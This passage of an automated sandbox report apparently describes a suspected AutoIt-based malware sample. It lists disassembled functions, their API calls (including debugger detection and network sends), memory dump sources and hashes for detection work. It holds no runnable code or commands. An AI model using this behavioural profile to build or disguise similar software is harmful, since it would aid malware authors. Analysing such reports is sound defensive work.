                                                                                                                                          • Part of subcall function 00763B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,008222E8,?), ref: 00763B65
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 2727075218-3081909835
                                                                                                                                        • Opcode ID: 26acf736c8d27fc83c90fc5fcba62959d38d4641db044d88091e14d1156a8f3b
                                                                                                                                        • Instruction ID: a2f511ba98dc7ca60730a0d67aa6caf4081d982190429b2c25ee76a48cb05561
                                                                                                                                        • Opcode Fuzzy Hash: 26acf736c8d27fc83c90fc5fcba62959d38d4641db044d88091e14d1156a8f3b
                                                                                                                                        • Instruction Fuzzy Hash: 4E11A7B1A10298ABCF05DFD4D8096DE7BFDAF45704F008009E902BB281CBB94A49CBA5
                                                                                                                                        Function 007634C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007D34AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                                        • Opcode ID: aba11a29deb415d8d4386672d791ac7263eb5b9754636fde7914ce2b6ade7629
                                                                                                                                        • Instruction ID: 46b4dd0a5383fad30c53e810f7ba65c0087d9dc6c41c25292e0d31fd4cf5e9c7
                                                                                                                                        • Opcode Fuzzy Hash: aba11a29deb415d8d4386672d791ac7263eb5b9754636fde7914ce2b6ade7629
                                                                                                                                        • Instruction Fuzzy Hash: 11F04F7194024DEA9F11EFA0C8958FFB778AA10310B108526A82692182EB3D9B09CB21
                                                                                                                                        Function 0077F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8ff3402d7d3ddd074bd76cb4d5bf2a588ca875d6962c11132048ff1d413ab059
                                                                                                                                        • Instruction ID: 210d6c80eaa1f4a294088af9fd2e6ed1b841cd93a5bb4a0f47dadd551132c620
                                                                                                                                        • Opcode Fuzzy Hash: 8ff3402d7d3ddd074bd76cb4d5bf2a588ca875d6962c11132048ff1d413ab059
                                                                                                                                        • Instruction Fuzzy Hash: C6519131604301DFCB14EF28C495BAA77E5AF88324F14856DF99A8B392DB38E905DB91
                                                                                                                                        Function 007B8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007B8074
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007B807A
                                                                                                                                          • Part of subcall function 007B6B19: GetWindowRect.USER32(?,?), ref: 007B6B2C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CursorForegroundRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1066937146-0
                                                                                                                                        • Opcode ID: 17d2d050e1d7a1bca8c8e9cae375ff9e72306f42f612f4f94172d0702fda46a4
                                                                                                                                        • Instruction ID: d26fba538e86e63957cf83834dea0d71cc6a2ff4b8a21ec85e86890f4a848522
                                                                                                                                        • Opcode Fuzzy Hash: 17d2d050e1d7a1bca8c8e9cae375ff9e72306f42f612f4f94172d0702fda46a4
                                                                                                                                        • Instruction Fuzzy Hash: 28313C75A00208EFDF11EFA4CC85AEEB7B8FF08314F108469E956A7251DB38AE45CB51
                                                                                                                                        Function 00761DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007DDB31
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007DDB6B
                                                                                                                                          • Part of subcall function 00761F04: GetForegroundWindow.USER32 ref: 00761FBE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Foreground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 62970417-0
                                                                                                                                        • Opcode ID: 1110db78c8eff1b90536d4298fdb06ea6211b2a9bf9254fd1ae8340d813604d4
                                                                                                                                        • Instruction ID: 6b1a71d3b323b02a5dbc5428497520b08f71fcf51e762f4e10b79368fdc460b1
                                                                                                                                        • Opcode Fuzzy Hash: 1110db78c8eff1b90536d4298fdb06ea6211b2a9bf9254fd1ae8340d813604d4
                                                                                                                                        • Instruction Fuzzy Hash: 5F21F0B2600246AEDB20AF74C898BFE77B9AF84384F04042AFD1B86141DB39ED018761
                                                                                                                                        Function 0079E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079E344
                                                                                                                                        • _strlen.LIBCMT ref: 0079E34F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2777139624-0
                                                                                                                                        • Opcode ID: 7f5f357e079b3b75635225bef69b92367cc858965a56fed1b1dd263c75eb42a9
                                                                                                                                        • Instruction ID: fcdd3a3637ac3bfa7ca8a05e7709e166820a684c8c95fbbd8f823e28206dcd13
                                                                                                                                        • Opcode Fuzzy Hash: 7f5f357e079b3b75635225bef69b92367cc858965a56fed1b1dd263c75eb42a9
                                                                                                                                        • Instruction Fuzzy Hash: D211A031600205FBDF05FBA8EC8E9BE7BA89F45350B104439FA069B192DE6D9C4697A0
                                                                                                                                        Function 00763682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • 745AC8D0.UXTHEME ref: 007636E6
                                                                                                                                          • Part of subcall function 00782025: __lock.LIBCMT ref: 0078202B
                                                                                                                                          • Part of subcall function 007632DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007632F6
                                                                                                                                          • Part of subcall function 007632DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0076330B
                                                                                                                                          • Part of subcall function 0076374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0076376D
                                                                                                                                          • Part of subcall function 0076374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0076377F
                                                                                                                                          • Part of subcall function 0076374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_222.exe,00000104,?,00821120,C:\Users\user\Desktop\._cache_222.exe,00821124,?,?), ref: 007637EE
                                                                                                                                          • Part of subcall function 0076374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00763860
                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00763726
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3809921791-0
                                                                                                                                        • Opcode ID: a9e76804865f8f742d04c3c68cada2aef518740e70e32c195bf32686b7e67448
                                                                                                                                        • Instruction ID: 1f0b9fd98564e6c1aa4a1a90414b6ffdf42c56cb8905e1d54a11bea6468cb100
                                                                                                                                        • Opcode Fuzzy Hash: a9e76804865f8f742d04c3c68cada2aef518740e70e32c195bf32686b7e67448
                                                                                                                                        • Instruction Fuzzy Hash: 9A11AEB1908344DFC720EF25DC4990ABBE8FB94750F00851EF455872B2DB789A46CF92
                                                                                                                                        Function 00764B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00764C2B,?,?,?,?,0076BE63), ref: 00764BB6
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00764C2B,?,?,?,?,0076BE63), ref: 007D4972
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 791e7be7f86a2e9e18e98884089e7631fb1fd083f1d29bda5d49ab154d8272f2
                                                                                                                                        • Instruction ID: fb7339be0e3304e2ef1d302ca565747d0da0cb363eeec58de07b8b85725b6364
                                                                                                                                        • Opcode Fuzzy Hash: 791e7be7f86a2e9e18e98884089e7631fb1fd083f1d29bda5d49ab154d8272f2
                                                                                                                                        • Instruction Fuzzy Hash: F00152B0248308BEF7344E24CCCAF767BDCEB05768F108359BAE95A1E0C6B95C458B54
                                                                                                                                        Function 0077F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                          • Part of subcall function 0077F2D0: _memmove.LIBCMT ref: 0077F307
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                        • Opcode ID: e82f3cd362aff6d6d6406cf8881c6b03f16a8e0e2a9445bf4879b4ab3bc694bc
                                                                                                                                        • Instruction ID: c1896ec304aa25f847df53a2c7036af33655967f2dde670a6097caa766fa4d91
                                                                                                                                        • Opcode Fuzzy Hash: e82f3cd362aff6d6d6406cf8881c6b03f16a8e0e2a9445bf4879b4ab3bc694bc
                                                                                                                                        • Instruction Fuzzy Hash: 31F031B6504114BFAB10AF659C88C7B7B9DEF4A3A07108026FD08CA111CA35DC00C6B4
                                                                                                                                        Function 0078F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 0078F7D9
                                                                                                                                        • __close_nolock.LIBCMT ref: 0078F7F2
                                                                                                                                          • Part of subcall function 0078886A: __getptd_noexit.LIBCMT ref: 0078886A
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                        • Opcode ID: e0409ca50b587a1debdf4ddf906dbfc4554893b9c52c1bd33bf76d593b720725
                                                                                                                                        • Instruction ID: 86ba1035092e12749ad21b82bf434fac654be1fe2d0568dc75fa05af2af3db67
                                                                                                                                        • Opcode Fuzzy Hash: e0409ca50b587a1debdf4ddf906dbfc4554893b9c52c1bd33bf76d593b720725
                                                                                                                                        • Instruction Fuzzy Hash: 6111E132895610CFD711BF68DC4A3597AA0AF41331FA64360E4315F1E3DBBC9941CBA2
                                                                                                                                        Function 007B9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 007B9534
                                                                                                                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 007B9557
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastsend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1802528911-0
                                                                                                                                        • Opcode ID: bebea3552914dd7e8dcdadf12fb47827e9012b780a0489224e5e3aa597c713ea
                                                                                                                                        • Instruction ID: 4e6c00bc1e9601e2a8b75ab1f76e1f8ddf5ab1d8d8a64e128d3ad3cec78359f4
                                                                                                                                        • Opcode Fuzzy Hash: bebea3552914dd7e8dcdadf12fb47827e9012b780a0489224e5e3aa597c713ea
                                                                                                                                        • Instruction Fuzzy Hash: 1D0171353002009FC720EB24C895B6AB7E9EF99720F10811DE65AC7392CB79EC01CB50
                                                                                                                                        Function 00784274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __lock_file.LIBCMT ref: 007842B9
                                                                                                                                          • Part of subcall function 00785A9F: __lock.LIBCMT ref: 00785AC2
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 007842C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                        • Opcode ID: d81a348bcf562655939613b424dc4d991434a9af5ea9aa803ffefc3599990dc8
                                                                                                                                        • Instruction ID: 8710cbc9f0d1bf7e472a997ec74178603959757c983c620e6a25d657c01f7bd9
                                                                                                                                        • Opcode Fuzzy Hash: d81a348bcf562655939613b424dc4d991434a9af5ea9aa803ffefc3599990dc8
                                                                                                                                        • Instruction Fuzzy Hash: E3F0B432889706DAD714BB76880A75E7BD07F40334F618209B8659B1C2CBBCD941DB56
                                                                                                                                        Function 007B90D3 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007B90E7
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B90F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastclosesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1278161333-0
                                                                                                                                        • Opcode ID: 2706def1cffcf4ad3613cf631d9ac0b1ea7044b4bd2ffd85e258b1ae21c147d2
                                                                                                                                        • Instruction ID: 4235ec9e9c6678a1f6bd3ab71d704090ed7f79a9743120779e4ba86adcda453c
                                                                                                                                        • Opcode Fuzzy Hash: 2706def1cffcf4ad3613cf631d9ac0b1ea7044b4bd2ffd85e258b1ae21c147d2
                                                                                                                                        • Instruction Fuzzy Hash: 28F08C30204248EFCB10EF68D889F993BD8AF09340F04C059FA49CB252CA78EC40DBA1
                                                                                                                                        Function 0077F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
